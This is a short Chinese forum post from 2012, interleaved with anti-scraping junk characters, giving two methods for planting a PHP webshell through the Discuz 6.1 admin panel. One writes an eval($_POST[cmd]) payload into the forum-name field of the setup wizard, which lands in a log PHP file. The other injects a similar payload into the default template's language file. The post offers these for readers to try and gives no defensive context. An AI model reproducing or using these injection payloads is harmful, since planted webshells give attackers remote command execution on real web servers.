discuz6.1两种方法后台拿shell
$ u# b2 j! ]8 ^, k* @+ I好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
% \9 v1 h$ E8 l% x% p P1 b+ l1:6 X4 }+ ^/ E- D% |3 x2 _2 Z- {
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
: w( M1 M; }5 u. aadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell' y, T+ v8 L. F3 ~8 M
<?php eval($_POST[cmd]);?>+ X1 j( x4 Q- ~& K
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php4 E$ k+ O4 o/ c! | g( k' o
! K* W' q) Z3 B- g* l/ B) l. ^
w ]8 ~! y4 |, [% V2:后台模板管理--默认模板套系--详情
, d- W2 a, f0 j Etemplates/default/actions.lang.php* y' F/ S8 e7 F
jhackj\\');eval($_POST[cmd])?>;//8 F/ T0 ^/ W4 c9 \3 X3 m4 y7 s
5 R( c: J. O5 j: s' G( Y
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对